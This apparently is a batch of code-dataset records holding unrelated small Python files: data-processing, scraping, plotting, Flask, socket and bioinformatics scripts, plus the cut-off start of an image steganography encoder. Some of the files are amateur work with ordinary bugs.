'index')\n if page == current_page:\n li_class = 'active'\n page_range.append(SPAN('(current)', _class='sr-only'))\n anchor = A(page_range, _href=href)\n pages.append(LI(anchor, _class=li_class))\n\n # Next/right.\n li_class = ''\n href = URL('poems', 'page', args=[str(next_page)])\n if next_page > 9:\n li_class = 'disabled'\n href = '#'\n span = SPAN(xmlescape(u'\\u4e0b'), **{'_aria-hidden': 'true'})\n anchor = A(span, _href=href, **{'_aria-label': 'Next'})\n pages.append(LI(anchor, _class=li_class, _title='Next Page'))\n\n # Together.\n return UL(pages, _class='pagination')\n","sub_path":"modules/poems.py","file_name":"poems.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39402799","text":"# coding: utf-8\r\nimport time\r\nimport logging\r\nimport pymongo\r\nfrom bson.code import Code \r\n\r\nRECORDS_NUM = 20\r\nLOG_FILENAME = \"/data/play_records_clean/logs/%s.log\"\r\n\r\n#MONGODB_HOST = \"localhost\"\r\nMONGODB_HOST = \"223.99.188.90\"\r\nMONGODB_PORT = 27017\r\n\r\ndef user_keep_N(collection, api_key, num):\r\n for one in collection.find({\"apiKey\":api_key}).sort(\"viewTime\",pymongo.DESCENDING).skip(num):\r\n #print one\r\n logging.info(\"%s\"%(one))\r\n #db.history.remove({\"_id\":one['_id']})\r\n db.history.delete_one({\"_id\":one['_id']})\r\n\r\nif __name__ == \"__main__\": \r\n now_second = time.time()\r\n now_time = time.localtime(now_second) \r\n str_day = time.strftime(\"%Y%m%d\", now_time)\r\n log_filename = LOG_FILENAME%(str_day)\r\n logging.basicConfig(filename=log_filename, level=logging.INFO)\r\n \r\n str_now_time= time.strftime(\"%Y-%m-%d %H:%M:%S\", now_time)\r\n logging.info(\"start @ %s\" % (str_now_time))\r\n \r\n connection = pymongo.MongoClient(MONGODB_HOST, MONGODB_PORT)\r\n db = connection.pub \r\n \r\n db.apikey_collection.drop() \r\n map_function = Code(\"function () {\" \r\n \"emit(this.apiKey, {count:1});\" \r\n \"}\") \r\n \r\n reduce_function = Code(\"function (key, values) {\" \r\n \" var total = 0;\" \r\n \" for (var i = 0; i < values.length; i++) {\" \r\n \" total += values[i].count;\" \r\n \" }\" \r\n \" return {count:total};\" \r\n \"}\") \r\n apikey_collection = db.history.map_reduce(map_function, reduce_function, out=\"apikey_collection\")\r\n user_index = 0\r\n user_list = []\r\n for one_apikey in apikey_collection.find():\r\n #print (\"index=%d, apikey=[%s], value=[%s]\" % (user_index, one_apikey['_id'], one_apikey['value']))\r\n logging.info(\"index=%d, apikey=[%s], value=[%s]\" % (user_index, one_apikey['_id'], one_apikey['value']))\r\n user_list.append(one_apikey['_id'])\r\n user_index = user_index + 1\r\n \r\n for one_user in user_list:\r\n user_keep_N(db.history, one_user, RECORDS_NUM)\r\n \r\n now_second = time.time()\r\n now_time = time.localtime(now_second) \r\n str_now_time= time.strftime(\"%Y-%m-%d %H:%M:%S\", now_time)\r\n logging.info(\"end @ %s\" % (str_now_time))\r\n \r\n ","sub_path":"play_records_clean.py","file_name":"play_records_clean.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404392444","text":"from sklearn.metrics import f1_score\nfrom datetime import timedelta\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nfrom constants import CONSTANTS\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom sklearn import preprocessing\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import confusion_matrix\nimport os\n\n# lucknowlabels = [2,1,1,2,2,2,5,4,3,1,5,5,5,3,2,2,5,5,4,3,4,5,4,2,5,5,5,5,2,2,3,2,2,5,3,2,5,2]\n\nfrom retail import getcenter\nretailpriceserieslucknow = getcenter('LUCKNOW')\nfrom mandi import getmandi\nfrom mandi import mandipriceseries\nfrom mandi import mandiarrivalseries \n#why lucknow mandi\nmandipriceserieslucknow = getmandi('Lucknow',True)\nmandiarrivalserieslucknow = getmandi('Lucknow',False)\n\ncwd = os.getcwd()\n\ndef whiten(series):\n import scipy\n EigenValues, EigenVectors = np.linalg.eig(series.cov())\n D = [[0.0 for i in range(0, len(EigenValues))] for j in range(0, len(EigenValues))]\n for i in range(0, len(EigenValues)):\n D[i][i] = EigenValues[i]\n DInverse = np.linalg.matrix_power(D, -1)\n DInverseSqRoot = scipy.linalg.sqrtm(D)\n V = np.dot(np.dot(EigenVectors, DInverseSqRoot), EigenVectors.T)\n series = series.apply(lambda row: np.dot(V, row.T).T, axis=1)\n return series\n\ndef whiten_series_list(list):\n\tfor i in range(0,len(list)):\n\t\tmean = list[i].mean()\n\t\tlist[i] -= mean\n\ttemp = pd.DataFrame()\n\tfor i in range(0,len(list)):\n\t\ttemp[i] = list[i]\n\ttemp = whiten(temp)\n\tnewlist = [temp[i] for i in range(0,len(list))]\n\treturn newlist\n\ndef Normalise(arr):\n m = arr.mean()\n am = arr.min()\n aM = arr.max()\n arr -= m\n arr /= (aM - am)\n return arr\n\ndef adjust_anomaly_window(anomalies,series):\n\tfor i in range(0,len(anomalies)):\n\t\tanomaly_period = series[anomalies[0][i]:anomalies[1][i]]\n\t\tmid_date_index = anomaly_period[10:31].argmax()\n\t\t# print type(mid_date_index),mid_date_index\n\t\t# mid_date_index - timedelta(days=21)\n\t\tanomalies[0][i] = mid_date_index - timedelta(days=21)\n\t\tanomalies[1][i] = mid_date_index + timedelta(days=21)\n\t\tanomalies[0][i] = datetime.strftime(anomalies[0][i],'%Y-%m-%d')\n\t\tanomalies[1][i] = datetime.strftime(anomalies[1][i],'%Y-%m-%d')\n\treturn anomalies\n\ndef get_anomalies(path,series):\n\tanomalies = pd.read_csv(path, header=None, index_col=None)\n\tanomalies[0] = [ datetime.strftime(datetime.strptime(date, '%Y-%m-%d'),'%Y-%m-%d') for date in anomalies[0]]\n\tanomalies[1] = [ datetime.strftime(datetime.strptime(date, ' %Y-%m-%d'),'%Y-%m-%d') for date in anomalies[1]]\n\tanomalies = adjust_anomaly_window(anomalies,series)\n\treturn anomalies\n\ndef get_anomalies_year(anomalies):\n\tmid_date_labels=[]\n\tfor i in range(0,len(anomalies[0])):\n\t\tmid_date_labels.append(datetime.strftime(datetime.strptime(anomalies[0][i],'%Y-%m-%d')+timedelta(days=21),'%Y-%m-%d'))\n\treturn mid_date_labels\n\n# def newlabels(anomalies,oldlabels):\n# labels = []\n# k=0\n# for i in range(0,len(anomalies)):\n# if(anomalies[2][i] != ' Normal_train'):\n# labels.append(oldlabels[k])\n# k = k+1\n# else:\n# labels.append(8)\n# return labels\n\ndef newlabels(anomalies):\n lucknowlabels = []\n for i in range(len(anomalies)):\n somestring = anomalies[2][i].strip().lower()\n if(somestring == 'transport' or somestring == 'fuel' or somestring == 'fuel hike' or somestring == 'strike'): #transport and fuel are related to each other\n lucknowlabels.append(1)\n elif(somestring == 'weather'):\n lucknowlabels.append(2)\n elif(somestring == 'inflation'):\n lucknowlabels.append(3)\n elif(somestring == 'hoarding'):\n lucknowlabels.append(4)\n elif(somestring == 'navratra'):\n lucknowlabels.append(5)\n else:\n lucknowlabels.append(8) #this is for the periods when tag is Normal_train\n return lucknowlabels\n\ndef prepare(anomalies,labels,priceserieslist):\n\tx = []\n\tfor i in range(0,len(anomalies)):\n\t\tp=[]\n\t\tfor j in range(0,len(priceserieslist)):\n\t\t\t# p += (Normalise(np.array(priceserieslist[j][anomalies[0][i]:anomalies[1][i]].tolist()))).tolist()\n\t\t\tp += ((np.array(priceserieslist[j][anomalies[0][i]:anomalies[1][i]].tolist()))).tolist()\n\n\t\t\t# if(i==0):\n\t\t\t# \tprint anomalies[0][i], anomalies[1][i]\n\t\tx.append(np.array(p))\n\treturn np.array(x),np.array(labels)\t\t\n\ndef getKey(item):\n\treturn item[0]\n\ndef partition(xseries,yseries,year,months):\n\tcombined_series = zip(year,xseries,yseries)\n\tcombined_series = sorted(combined_series,key=getKey)\n\ttrain = []\n\ttrain_labels = []\n\tfixed = datetime.strptime('2006-01-01','%Y-%m-%d')\n\ti=0\n\twhile(fixed < datetime.strptime('2017-11-01','%Y-%m-%d')):\n\t\tcurrx=[]\n\t\tcurry=[]\n\t\tfor anomaly in combined_series:\n\t\t\ti += 1\n\t\t\tif(datetime.strptime(anomaly[0],'%Y-%m-%d') > fixed and datetime.strptime(anomaly[0],'%Y-%m-%d')- fixed <= timedelta(days=months*30)):\n\t\t\t\tcurrx.append(anomaly[1])\n\t\t\t\tcurry.append(anomaly[2])\n\t\ttrain.append(currx)\n\t\ttrain_labels.append(curry)\n\t\tfixed = fixed +timedelta(days = months*30)\n\treturn np.array(train),np.array(train_labels)\n\ndef get_score(xtrain,xtest,ytrain,ytest):\n\tscaler = preprocessing.StandardScaler().fit(xtrain)\n\txtrain = scaler.transform(xtrain)\n\txtest = scaler.transform(xtest)\n\tmodel = RandomForestClassifier(max_depth=3, random_state=0)\n\tmodel.fit(xtrain,ytrain)\n\ttest_pred = np.array(model.predict(xtest))\n\treturn test_pred\n\ndef train_test_function(align_l, data_l):\n\tanomalieslucknow = get_anomalies('data/anomaly/normal_h_w_lucknow.csv',align_l)\n\tlucknowlabelsnew = newlabels(anomalieslucknow)\n\t# lucknowlabelsnew = getlabels(anomalieslucknow)\n\tlucknow_anomalies_year = get_anomalies_year(anomalieslucknow)\n\tx,y = prepare(anomalieslucknow,lucknowlabelsnew,data_l)\n\txall = np.array(x.tolist())\n\tyall = np.array(y.tolist())\n\txall_new =[]\n\tyall_new = []\n\tyearall_new = []\n\tyearall = np.array(lucknow_anomalies_year)\n\n\tfor y in range(0,len(yall)):\n\t\tif( yall[y] == 2 or yall[y]==3 or yall[y]==5 or yall[y] == 1 or yall[y] == 4):\n\t\t\txall_new.append(xall[y])\n\t\t\tyall_new.append(1)\n\t\t\tyearall_new.append(yearall[y])\n\t\telif (yall[y] == 8):\n\t\t\txall_new.append(xall[y])\n\t\t\tyall_new.append(0)\n\t\t\tyearall_new.append(yearall[y])\n\n\tassert(len(xall_new) == len(yearall_new))\n\ttotal_data, total_labels = partition(xall_new,yall_new,yearall_new,6)\n\tpredicted = []\n\tactual_labels = []\n\tfor i in range(0,len(total_data)):\n\t\tif( len(total_data[i]) != 0):\t\n\t\t\ttest_split = total_data[i]\n\t\t\ttest_labels = total_labels[i]\n\t\t\tactual_labels = actual_labels + test_labels\n\t\t\ttrain_split = []\n\t\t\ttrain_labels_split = []\n\t\t\tfor j in range(0,len(total_data)):\n\t\t\t\tif( j != i):\n\t\t\t\t\ttrain_split = train_split + total_data[j]\n\t\t\t\t\ttrain_labels_split = train_labels_split+total_labels[j]\n\t\t\tpred_test = get_score(train_split,test_split,train_labels_split,test_labels)\t\n\t\t\tpredicted = predicted + pred_test.tolist()\n\tpredicted = np.array(predicted)\n\tactual_labels = np.array(actual_labels)\n\tprint (sum(predicted == actual_labels) * 100.0)/len(predicted)\n\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[mandipriceserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow,mandipriceserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow-mandipriceserieslucknow,mandiarrivalserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow-mandipriceserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow,mandiarrivalserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow,mandipriceserieslucknow,mandiarrivalserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow/mandipriceserieslucknow])\n","sub_path":"crawler/step1_binary.py","file_name":"step1_binary.py","file_ext":"py","file_size_in_byte":7653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61638657","text":"# Name: Tahseen Bin Taj\n\nimport doctest, datetime, numpy\nimport matplotlib.pyplot as plt\n\ndef date_diff(d1, d2):\n '''\n (str), (str) -> (int)\n Takes two datetime.date objects as inputs and finds the difference\n in days between them.\n >>> date_diff('2019-10-31', '2019-11-2')\n 2\n '''\n d1 = str_to_date(d1)\n d2 = str_to_date(d2)\n return (d2 - d1).days\n\n\ndef get_age(d1, d2):\n '''\n (str), (str) -> (int)\n Takes two datetime.date objects as inputs and finds the age of the patient\n using it in years.\n >>> get_age('2018-10-31', '2019-11-2')\n 1\n >>> get_age('2018-10-31', '2000-11-2')\n -17\n '''\n a_year = 365.2425\n return int(date_diff(d1, d2)/a_year)\n\ndef str_to_date(d):\n '''\n (str) -> (datetime.date)\n Takes a string as an input and returns it in datetime.date format.\n >>> str_to_date('2019-11-2')\n datetime.date(2019, 11, 2)\n >>> str_to_date('2018-10-31')\n datetime.date(2018, 10, 31)\n '''\n d = d.split('-')\n date = datetime.date(int(d[0]), int(d[1]), int(d[2]))\n return date\n\n\ndef stage_three(input_filename, output_filename):\n \"\"\"\n (str), (str) -> (dict)\n Takes two filenames as inputs and returns a dictionary with days in pandemic\n as keys and I, H, R as subkeys with their counts as values.\n >>> stage_three('stage2.tsv', 'stage3.tsv')\n {0: {'I': 1, 'D': 0, 'R': 0}, 1: {'I': 3, 'D': 0, 'R': 0}, \\\n2: {'I': 8, 'D': 0, 'R': 0}, 3: {'I': 20, 'D': 0, 'R': 0}, \\\n4: {'I': 47, 'D': 2, 'R': 0}, 5: {'I': 107, 'D': 11, 'R': 0}, \\\n6: {'I': 259, 'D': 20, 'R': 0}, 7: {'I': 621, 'D': 55, 'R': 1}, \\\n8: {'I': 1524, 'D': 113, 'R': 0}, 9: {'I': 197, 'D': 10, 'R': 1}}\n \"\"\"\n in_file = open(input_filename, 'r', encoding = 'utf-8')\n out_file = open(output_filename, 'w', encoding = 'utf=8')\n count = 0\n ret = {}\n for line in in_file:\n edited = line.split('\\t')\n if count == 0:\n i_date = edited[2]\n count += 1\n edited[2] = str(date_diff(i_date, edited[2]))\n edited[3] = str(get_age(edited[3], i_date))\n if edited[6][0].upper() in 'IDR':\n edited[6] = edited[6][0].upper()\n else:\n edited[6] = 'D'\n if int(edited[2]) not in ret:\n ret[int(edited[2])] = dict.fromkeys(['I', 'D', 'R'], 0)\n ret[int(edited[2])][edited[6]] += 1\n edited = '\\t'.join(edited)\n out_file.write(edited)\n in_file.close()\n out_file.close()\n return ret\n\ndef plot_time_series(d):\n '''\n (dict) -> (list of lists)\n Takes a dictionary as input and returns a list of lists containing\n the count of I, D and R.\n '''\n ret_list = []\n for key in d:\n temp = []\n temp.append(d[key]['I'])\n temp.append(d[key]['R'])\n temp.append(d[key]['D'])\n ret_list.append(temp)\n plt.plot(ret_list)\n plt.legend(['Infected', 'Recovered', 'Dead'])\n plt.title('Time series of early pandemic, by Tahseen Bin Taj')\n plt.xlabel('Days into Pandemic')\n plt.ylabel('Number of People')\n plt.savefig('time_series.png')\n return ret_list\n \nif __name__ == '__main__':\n doctest.testmod()\n","sub_path":"time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122877949","text":"# coding:utf-8\n# web address : http://pymotw.com/2/socket/tcp.html\n\nfrom __future__ import print_function\nimport socket\nimport sys\n\nfrom common_func import warning\n\n# create a socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# bind the socket to a port\n# empty string means any ip address\nbind_address = ('', 10000)\nsock.bind(bind_address)\n\n# Listening for incoming connections\nsock.listen(1)\nwhile True:\n warning(\"waiting for a connection\")\n connection, client_address = sock.accept()\n try:\n warning(\"connection from \" + client_address[0] + \"port : \" + str(client_address[1]))\n\n #receive the data and return the data\n while True:\n data = connection.recv(16)\n warning(\"received: \" + data.decode('utf-8'))\n if data:\n warning(\"send data back to client\")\n connection.sendall(data)\n else:\n warning(\"no more data anymore\")\n break\n finally:\n connection.close()\n","sub_path":"demo/socket_demo/socket_single_thread_server.py","file_name":"socket_single_thread_server.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"21360485","text":"from flask import render_template, flash, redirect, url_for\nfrom . import dashboard\nfrom flask_login import login_required, current_user\nfrom .. import db\nfrom ..models import User, Country, Airport, CarryListing\nfrom .forms import CarryForm\n\n\n\n\n@dashboard.route('/')\n@login_required\ndef index():\n user = current_user\n return render_template('dashboard/index.html', user=user)\n\n \n@dashboard.route('/newcarry', methods=['GET', 'POST'])\n@login_required\ndef new_carry():\n form = CarryForm()\n if form.validate_on_submit():\n carry_list = CarryListing(from_country=form.from_country.data,\n to_country=form.to_country.data,\n from_airport=form.from_airport.data,\n to_airport=form.to_airport.data,\n additional_info=form.additional_info.data,\n flight_date=form.flight_date.data,\n user=current_user)\n db.create_all()\n db.session.add(carry_list)\n db.session.commit()\n flash('Your listing was added successfully.')\n return redirect(url_for('.index'))\n return render_template('dashboard/newcarry.html', form=form)","sub_path":"venv/app/dashboard/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"651065779","text":"import subprocess\nimport os\nimport datetime\nimport time\n\ndef createSubprocess(cmd,pipeStdout=True,checkRetcode=True):\n\t\"\"\"\n\tFunction : Creates a subprocess via a call to subprocess.Popen with the argument 'shell=True', and pipes stdout and stderr. Stderr is always piped, but stdout can be turned off.\n If the argument checkRetcode is True, which it is by defualt, then for any non-zero return code, an Exception is\n\t\t\t\t\t\t raised that will print out the the command, stdout, stderr, and the returncode when not caught. Otherwise, the Popen instance will be return, in which case the caller must \n\t\t\t\t\t call the instance's communicate() method (and not it's wait() method!!) in order to get the return code to see if the command was a success. communicate() will return \n\t\t\t\t\t\t a tuple containing (stdout, stderr). But at that point, you can then check the return code with Popen instance's 'returncode' attribute.\n\tArgs : cmd - str. The command line for the subprocess wrapped in the subprocess.Popen instance. If given, will be printed to stdout when there is an error in the subprocess.\n\t\t\t\t\t\t pipeStdout - bool. True means to pipe stdout of the subprocess.\n\t\t\t\t\t\t checkRetcode - bool. See documentation in the description above for specifics.\n\tReturns : A two-item tuple containing stdout and stderr, respectively.\n\t\"\"\"\n\tstdout = None\n\tif pipeStdout:\n\t\tstdout = subprocess.PIPE\n\t\tstderr = subprocess.PIPE\n\tpopen = subprocess.Popen(cmd,shell=True,stdout=stdout,stderr=subprocess.PIPE)\n\tif checkRetcode:\n\t\tstdout,stderr = popen.communicate()\n\t\tif not stdout: #will be None if not piped\n\t\t\tstdout = \"\"\n\t\tstdout = stdout.strip()\n\t\tstderr = stderr.strip()\n\t\tretcode = popen.returncode\n\t\tif retcode:\n\t\t\t#below, I'd like to raise a subprocess.SubprocessError, but that doens't exist until Python 3.3.\n\t\t\traise Exception(\"subprocess command '{cmd}' failed with returncode '{returncode}'.\\n\\nstdout is: '{stdout}'.\\n\\nstderr is: '{stderr}'.\".format(cmd=cmd,returncode=retcode,stdout=stdout,stderr=stderr))\n\t\treturn stdout,stderr\n\telse:\n\t\treturn popen\n\n\ndef getFileAgeMinutes(infile):\n\t\"\"\" \n\tFunction : Calculates the age of a file in hours. Partial hours are always rounded down a whole number.\n\t\t\t\t\t Raises an IOError of the input file doens't exist.\n\t\"\"\"\n\tif not os.path.exists(infile):\n\t\traise IOError(\"Can't check age of non-existant file '{infile}'\".format(infile=infile))\n\tmtime = datetime.datetime.fromtimestamp(os.path.getmtime(infile))\n\tnow = datetime.datetime.now()\n\tdiff = now - mtime\n\tseconds = diff.total_seconds()\n\tminutes = seconds/60\n\treturn minutes\n\ndef getCurTime():\n\tepochTime = time.time()\n\tt = datetime.datetime.fromtimestamp(epochTime)\n\treturn \"{year}-{month}-{day}.{hour}.{minute}.{second}\".format(year=t.year,month=t.month,day=t.day,hour=t.hour,minute=t.minute,second=t.second)\n","sub_path":"gbsc_utils.py","file_name":"gbsc_utils.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"477565237","text":"\nimport scrapy\n\n\nclass LeboncoinSpider(scrapy.Spider):\n name = \"leboncoin\"\n\n def start_requests(self):\n urls = [\n 'https://www.leboncoin.fr/recherche/?text=Velo%20babboe',\n 'https://www.leboncoin.fr/recherche/?text=Velo%20yuba',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n for ad in response.css('li[data-qa-id=\"aditem_container\"]'):\n yield {\n 'title': ad.css('span[data-qa-id=\"aditem_title\"]::text').get().strip(),\n 'description': '',\n 'price': ad.css('div[data-qa-id=\"aditem_price\"] span span[itemprop=\"priceCurrency\"]::text').get().replace(\" \", \"\").replace(\"€\", \"\").strip(),\n 'location': ad.css('p[data-qa-id=\"aditem_location\"]::text').get().strip(),\n 'source': 'leboncoin',\n }\n","sub_path":"scrapper/spiders/leboncoin_spider.py","file_name":"leboncoin_spider.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18923554","text":"\r\nfrom copy import deepcopy\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nplt.rcParams['figure.figsize'] = (16, 9)\r\nplt.style.use('ggplot')\r\n\r\n#importing datasets\r\n\r\nfrom sklearn.externals import joblib\r\ndata = joblib.load('C:\\\\Users\\\\pradi\\\\Documents\\\\Avantika\\\\Cloudera\\\\cloudera-quickstart-vm-5.13.0-0-virtualbox\\\\cloudera-quickstart-vm-5.13.0-0-virtualbox\\\\2016-06-20-0001Z.json')\r\n\r\ndef clustering(data):\r\n# data = pd.read_csv('airplane')#change when data is received\r\n# print(data.shape)\r\n# print data.head(10)\r\n \r\n #Value plotting\r\n pt1 = data.Spd.head(10000)\r\n pt2 = data.Alt.head(10000)\r\n x = np.array(list(zip(pt1, pt2)))\r\n# x = pd.DataFrame(pt1.head(10000), pt2.head(10000))\r\n print(x)\r\n plt.scatter(pt1, pt2, c='black', s=7)\r\n \r\n #Calculating distance for updating centroid\r\n def dist(a, b, ax=1):\r\n return np.linalg.norm(a - b, axis=ax)\r\n \r\n # Number of clusters\r\n number = 2\r\n # X coordinates of random centroids\r\n x_coord = np.random.randint(0, np.max(pt1)-20, size=number)\r\n # Y coordinates of random centroids\r\n y_coord = np.random.randint(0, np.max(pt2)-20, size=number)\r\n C = np.array(list(zip(x_coord, y_coord)), dtype=np.float32)\r\n print(C)\r\n # To store the value of centroids when it updates\r\n old = np.zeros(C.shape)\r\n # Cluster Lables(0, 1, 2)\r\n clusters = np.zeros(len(x))\r\n # Error func. - Distance between new centroids and old centroids\r\n error = dist(C, old, None)\r\n # Loop will run till the error becomes zero\r\n while error != 0:\r\n print(error)\r\n # Assigning each value to its closest cluster\r\n for i in range(len(x)):\r\n distances = dist(x[i], C)\r\n cluster = np.argmin(distances)\r\n clusters[i] = cluster\r\n # Storing the old centroid values\r\n old = deepcopy(C)\r\n # Finding the new centroids by taking the average value\r\n for i in range(number):\r\n points = [x[j] for j in range(len(x)) if clusters[j] == i]\r\n C[i] = np.mean(points, axis=0)\r\n error = dist(C, old, None)\r\n \r\n plt.scatter(C[0], C[1])\r\nplt.show()","sub_path":"K-Means Clustering.py","file_name":"K-Means Clustering.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"127483012","text":"## Python application that gives visual of covid infection in Nepal. \n## Disclaimer: This is based on fake data. \nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport altair as alt\nimport pydeck as pdk\n\nDATE_TIME = \"date/time\"\nDATA_URL = (\n \"covidnepal.csv\"\n)\n\n@st.cache(persist=True)\ndef load_data(nrows):\n data = pd.read_csv(DATA_URL, nrows=nrows)\n lowercase = lambda x: str(x).lower()\n data.rename(lowercase, axis=\"columns\", inplace=True)\n # data[DATE_TIME] = pd.to_datetime(data[DATE_TIME])\n return data\n\ndata = load_data(1000)\n\n##Raw Data\n'This is based on Imaginary Data', data\n\n\n\n'This is based on imaginary data. Made just for the purpose of demo', st.map(data)\n","sub_path":"src/covidnepal.py","file_name":"covidnepal.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"14588105","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : emilyenglish\nDate : 2019-02-26\nPurpose: fasta gc segregator\n\"\"\"\n\nimport argparse\nimport sys\nfrom collections import Counter\nimport os\nfrom Bio import SeqIO\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Segregate FASTA sequences by GC content',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n 'FASTA', metavar='FASTA', help='fasta file', nargs = '+')\n\n parser.add_argument(\n '-o',\n #SeqIO.write(record, out.fh, out_fmt)\n '--out_dir',\n help='A named string argument',\n metavar='DIR',\n type=dir,\n default='out')\n\n parser.add_argument(\n '-p',\n '--pct_gc',\n help='A named integer argument',\n metavar='int',\n type=int,\n default=50)\n\n \n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef warn(msg):\n \"\"\"Print a message to STDERR\"\"\"\n print(msg, file=sys.stderr)\n\n\n# --------------------------------------------------\ndef die(msg='Something bad happened'):\n \"\"\"warn() and exit with error\"\"\"\n warn(msg)\n sys.exit(1)\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n args = get_args()\n FASTA = args.FASTA\n out_dir = args.out_dir\n pct_gc = args.pct_gc\n \n files = 0\n totnum = 0\n for file in FASTA:\n if not os.path.isfile(file):\n print(('\"{}\" is not a file').format(file))\n else:\n num = 0\n files +=1\n basename = os.path.basename(file)\n highout_name = os.path.splittext(basename) [0] + '_' + 'high' +os.path.splittext(basename) [1]\n lowout_name = os.path.splittext(basename) [0] + '_' + 'low' + os.path.splittext(basename) [1]\n high = os.path.join(dirname, highout_name)\n low = os.path.join(dirname, highout_name) \n high_fh = open(high, 'wt')\n low_fh = open(low, 'wt')\n #highout=os.path.splittext(name) \n for record in SeqIO.parse(file, 'fasta'):\n num += 1\n seqlen= len(record.seq)\n dna = Counter((record.seq))\n gc = dna.get('G', 0) +dna.get('C', 0)\n print(record.seq)\n print(int(gc/seqlen*100))\n gc1= int(gc/seqlen*100)\n print('HIGH' if gc1 >= pct_gc else 'LOW')\n if gc1 >= pct_gc:\n SecIO.write(seq_record, high_fh, \"fasta\")\n else: \n SecIO.write(seq_record, low_fh, \"fasta\")\n #splitext\n #09 - python parsing for help\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/06-fasta-gc/gc.py","file_name":"gc.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"581937809","text":"import sys\n\ndef accum(s):\n splitUp = list(s)\n for (key, char) in enumerate(splitUp):\n if char.islower(): \n splitUp[key] = char.capitalize()\n for i in range(key):\n if char.islower():\n splitUp[key] = splitUp[key] + char \n else:\n splitUp[key] = splitUp[key] + char.lower()\n string = \"-\".join(splitUp)\n return string;\n\nprint(accum(sys.argv[1]))\n\n# def accum(s):\n# enum = enumerate(s)\n# string = '-'.join(c.upper() + c.lower() * i for (i, c) in enumerate(s))\n\n# return string;\n","sub_path":"easy/accum.py","file_name":"accum.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"313865686","text":"from prime import permutations\nfrom time import time\n\nstart=time()\n\nP = {\n 3: lambda n: int(n * (n + 1) / 2),\n 4: lambda n: n ** 2,\n 5: lambda n: int(n * (3 * n - 1) / 2),\n 6: lambda n: n * (2 * n - 1),\n 7: lambda n: int(n * (5 * n - 3) / 2),\n 8: lambda n: n * (3 * n - 2),\n}\n\nB = {\n x: [\n P[x](n) for n in xrange(150)\n if 999 < P[x](n) < 10000 and\n P[x](n) % 100 > 9\n ] for x in xrange(3, 9)\n}\n\nfor i in permutations(''.join(str(j) for j in xrange(3, 9))):\n cycle = {x: ((int(i[x - 3]) - 2) % 6 + 3) for x in xrange(3, 9)}\n first = int(i[0])\n j = cycle[first]\n c = 0\n while j != first:\n c += 1\n j = cycle[j]\n if c != 5:\n continue\n anticycle = {value: key for key, value in cycle.iteritems()}\n \n C = B\n while not all(len(s) == 1 for s in C.values()):\n l = sum(len(x) for x in C.values())\n C = {\n x: [\n n for n in C[x] if\n any(n % 100 == m / 100 for m in C[cycle[x]]) and\n any(n / 100 == m % 100 for m in C[anticycle[x]])\n ] for x in xrange(3, 9)\n }\n if l == sum(len(x) for x in C.values()):\n break\n else:\n print('{}'.format(sum(list(x)[0] for x in C.values())))\n\nprint(time() - start)\n","sub_path":"61.py","file_name":"61.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"265262538","text":"import cv2\n\ndef write_key(key):\n file = open('key.txt','w')\n file.write(key)\n file.close()\n\ndef check_spell():\n file = open('key.txt','r')\n return (file.read())\n\ndef binarize(message):\n for c in message:\n yield ord(c)\n\ndef get_image(image_location):\n img = cv2.imread(image_location)\n return img\n\ndef encode(image_location, message,key):\n write_key(key)\n \n img = get_image(image_location)\n msg = binarize(message)\n \n pattern = 8\n for i in range(len(img)):\n for j in 